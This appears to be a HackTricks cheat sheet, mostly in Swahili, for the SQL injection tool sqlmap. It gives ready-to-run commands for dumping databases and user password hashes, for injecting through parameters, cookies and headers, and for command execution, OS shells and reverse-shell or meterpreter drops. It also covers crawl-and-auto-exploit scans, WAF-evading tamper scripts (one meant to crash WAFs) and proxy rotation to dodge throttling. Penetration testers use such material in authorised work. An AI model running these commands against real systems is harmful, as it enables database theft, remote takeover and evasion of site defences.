SQLMap

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Vigezo vya msingi vya SQLmap

Za kawaida

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY

Bendera za mbinu (--technique)

Hoja --technique inaeleza ni mbinu gani za SQL injection ambazo sqlmap itajaribu. Kila herufi katika mnyororo inawakilisha mbinu:

HerufiMbinuMaelezo
BBoolean-based blindInatumia masharti ya true/false kubaini data
EError-basedInatumia ujumbe wa makosa wa DBMS wenye maelezo mengi ku-exfiltrate matokeo
UUNION queryInaingiza maagizo ya UNION SELECT ili kupata data kupitia kanali hiyo hiyo
SStacked queriesInaongeza amri za ziada zilizotenganishwa kwa ;
TTime-based blindInategemea ucheleweshaji (SLEEP, WAITFOR) kugundua injection
QInline / out-of-bandInatumia functions kama LOAD_FILE() au OOB channels kama DNS

Mpangilio wa chaguo-msingi ni BEUSTQ. Unaweza kuyapanga upya au kuyapunguza, kwa mfano Boolean na Time-based tu kwa mpangilio huo:

sqlmap -u "http://target/?id=1" --technique="BT" --batch

Pata Taarifa

Ndani

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB

Taarifa za DB

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Mahali pa Injection

Kutoka kwa Burp/ZAP capture

Chukua request na unda faili req.txt

sqlmap -r req.txt --current-user

GET Request Injection

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injections katika Headers na HTTP Methods nyingine

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Second order injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Kagua tovuti kwa kutumia SQLmap na auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Kubinafsisha Injection

Weka kiambishi cha mwisho

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Kiambishi awali

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Msaada wa kupata boolean injection

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
TamperDescription
apostrophemask.pyInabadilisha alama ya apostrophe na counterpart yake ya UTF-8 full width
apostrophenullencode.pyInabadilisha alama ya apostrophe na counterpart yake ya double unicode isiyo halali
appendnullbyte.pyInaongeza tabia ya NULL byte iliyokodishwa mwishoni mwa payload
base64encode.pyInafanya Base64 kwa herufi zote katika payload iliyotolewa
between.pyInabadilisha operator ya greater than (‘>’) kuwa ‘NOT BETWEEN 0 AND #’
bluecoat.pyInabadilisha nafasi baada ya SQL statement na blank character halali ya random. Baadaye inabadilisha character = kuwa operator LIKE
chardoubleencode.pyInafanya url-encode mara mbili kwa herufi zote katika payload iliyotolewa (not processing already encoded)
commalesslimit.pyInabadilisha matukio kama ‘LIMIT M, N’ kuwa ‘LIMIT N OFFSET M’
commalessmid.pyInabadilisha matukio kama ‘MID(A, B, C)’ kuwa ‘MID(A FROM B FOR C)’
concat2concatws.pyInabadilisha matukio kama ‘CONCAT(A, B)’ kuwa ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’
charencode.pyIna-url-encode herufi zote katika payload iliyotolewa (not processing already encoded)
charunicodeencode.pyIna-unicode-url-encode herufi ambazo hazjakodishwa katika payload iliyotolewa (not processing already encoded). “%u0022”
charunicodeescape.pyIna-unicode-url-encode herufi ambazo hazjakodishwa katika payload iliyotolewa (not processing already encoded). “\u0022”
equaltolike.pyInabadilisha matukio yote ya operator equal (‘=’) kuwa operator ‘LIKE’
escapequotes.pyInatafutia nukuu kwa slash (’ and “)
greatest.pyInabadilisha operator ya greater than (‘>’) kuwa kinidume ‘GREATEST’
halfversionedmorekeywords.pyInaongeza comment ya MySQL yenye version kabla ya kila keyword
ifnull2ifisnull.pyInabadilisha matukio kama ‘IFNULL(A, B)’ kuwa ‘IF(ISNULL(A), B, A)’
modsecurityversioned.pyInazunguka query nzima na comment yenye version
modsecurityzeroversioned.pyInazunguka query nzima na comment yenye zero-version
multiplespaces.pyInaongeza nafasi nyingi kuzunguka keywords za SQL
nonrecursivereplacement.pyInabadilisha keywords za SQL zilizoainishwa na uwakilishi unaofaa kwa filters za replacement (e.g. .replace(“SELECT”, “”))
percentage.pyInaongeza alama ya percentage (‘%’) mbele ya kila character
overlongutf8.pyInageuza herufi zote katika payload iliyotolewa (not processing already encoded)
randomcase.pyInabadilisha kila herufi ya keyword kuwa kwa case ya random
randomcomments.pyInaongeza comments za random kwa keywords za SQL
securesphere.pyInaongeza string maalum iliyotengenezwa
sp_password.pyInaongeza ‘sp_password’ mwishoni mwa payload kwa obfuscation ya moja kwa moja kutoka DBMS logs
space2comment.pyInabadilisha nafasi (’ ’) kuwa comments
space2dash.pyInabadilisha nafasi (’ ‘) kuwa dash comment (’–‘) ikifuatiwa na string ya random na newline (’\n’)
space2hash.pyInabadilisha nafasi (’ ‘) kuwa pound character (’#‘) ikifuatiwa na string ya random na newline (’\n’)
space2morehash.pyInabadilisha nafasi (’ ‘) kuwa pound character (’#‘) ikifuatiwa na string ya random na newline (’\n’)
space2mssqlblank.pyInabadilisha nafasi (’ ’) kuwa blank character ya random kutoka kwenye seti halali ya characters mbadala
space2mssqlhash.pyInabadilisha nafasi (’ ‘) kuwa pound character (’#‘) ikifuatiwa na newline (’\n’)
space2mysqlblank.pyInabadilisha nafasi (’ ’) kuwa blank character ya random kutoka kwenye seti halali ya characters mbadala
space2mysqldash.pyInabadilisha nafasi (’ ‘) kuwa dash comment (’–‘) ikifuatiwa na newline (’\n’)
space2plus.pyInabadilisha nafasi (’ ‘) kuwa plus (’+’)
space2randomblank.pyInabadilisha nafasi (’ ’) kuwa blank character ya random kutoka kwenye seti halali ya characters mbadala
symboliclogical.pyInabadilisha operator za mantiki AND na OR kuwa majina yao ya kiteknolojia (&& and ||)
unionalltounion.pyInabadilisha UNION ALL SELECT kuwa UNION SELECT
unmagicquotes.pyInabadilisha alama ya nukuu (’) na combo ya multi-byte %bf%27 pamoja na comment ya jumla mwishoni (ili kufanya ifanye kazi)
uppercase.pyInabadilisha kila herufi ya keyword kuwa kwa upper case ‘INSERT’
varnish.pyInaongeza header ya HTTP ‘X-originating-IP’
versionedkeywords.pyInazunguka kila keyword isiyo-function kwa comment ya MySQL yenye version
versionedmorekeywords.pyInazunguka kila keyword kwa comment ya MySQL yenye version
xforwardedfor.pyInaongeza header ya fake HTTP ‘X-Forwarded-For’
luanginxmore.pyPOST-only tamper inayoongeza mamilioni ya parameters za dummy kabla ya payload yako ili kuendeleza parsers za Lua‑Nginx WAF (mfano, Cloudflare).

luanginxmore inazalisha takriban ~4.2M parameters za POST za random kabla ya payload yako; itumie tu pamoja na --method=POST na tarajia ukubwa mkubwa wa request ambao unaweza kusababisha crash kwa WAF za Lua‑Nginx zilizo konfigurishwa vibaya.

Vibadili vya hivi karibuni vinavyostahili kuamilishwa (>=1.9.x)

  • HTTP/2 transport: --http2 inalazimisha sqlmap kuzungumza HTTP/2 (inasaidia dhidi ya front-ends zinazoweka rate-limit kwa HTTP/1.1 lakini kupunguza vikwazo kwa h2). Changanya na --force-ssl ili kufunga HTTPS.
  • Proxy rotation: --proxy-file proxies.txt --proxy-freq 3 itazungusha kupitia orodha, ikibadilisha proxy kila requests 3 ili kuepuka throttling inayotegemea IP.
  • Offline / purge modes: --offline inarejelea data ya session iliyohifadhiwa bila kugusa target (trafiki ya mtandao sifuri), wakati --purge inafuta kwa usalama directory ya session/output unapo maliza.
  • Mobile UA emulation: --mobile itakuuliza kuiga User-Agent maarufu ya smartphone, muhimu kwa APIs zinazofichua fields za ziada kwa wateja wa mobile.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks